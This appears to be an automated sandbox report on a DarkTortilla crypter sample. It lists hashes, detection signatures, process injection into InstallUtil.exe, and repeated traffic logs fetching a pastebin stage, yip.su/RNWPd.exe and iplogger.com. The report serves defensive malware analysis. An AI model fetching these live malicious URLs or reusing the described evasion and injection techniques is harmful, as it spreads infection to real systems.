Edit tour

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Overview

General Information

Sample name:	SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe
Analysis ID:	1491227
MD5:	d8af2fcab18bcb456063134e43294027
SHA1:	ba314352f6f942833719370dce1a9787a5a73d56
SHA256:	1f505dfeee1da7c057e8d747a9d0de93e10d31907e7b8f533e090ef62f70785e
Tags:	exe
Infos:

Detection

DarkTortilla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe" MD5: D8AF2FCAB18BCB456063134E43294027)

InstallUtil.exe (PID: 7628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1622766007.0000000006150000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1614555856.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe PID: 5768	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe PID: 5768	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security

Unpacked PEs

Source	Rule	Description	Author
11.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.2f8b984.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.6150000.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.6150000.2.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.7 - Destination IP: 172.67.19.24

Timestamp:	2024-08-11T11:22:25.627292+0200
SID:	2803305
Severity:	3
Source Port:	49725
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://yip.su/RNWPd.exe	Avira URL Cloud: Label: malware
Source: https://pastebin.com/raw/V6VJsrV3	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: yip.su	Virustotal: Detection: 7%	Perma Link
Source: https://yip.su	Virustotal: Detection: 7%	Perma Link
Source: https://pastebin.com/raw/V6VJsrV3	Virustotal: Detection: 7%	Perma Link
Source: https://yip.su/RNWPd.exe	Virustotal: Detection: 15%	Perma Link
Source: http://yip.su	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	ReversingLabs: Detection: 28%
Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe	Virustotal: Detection: 32%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.7:49713 version: TLS 1.2

Source: SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match	File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exe.2f8b984.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: iplogger.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: yip.su
Source: global traffic	DNS traffic detected: DNS query: iplogger.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:21:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:21:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:21:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:21:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 11 Aug 2024 09:22:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
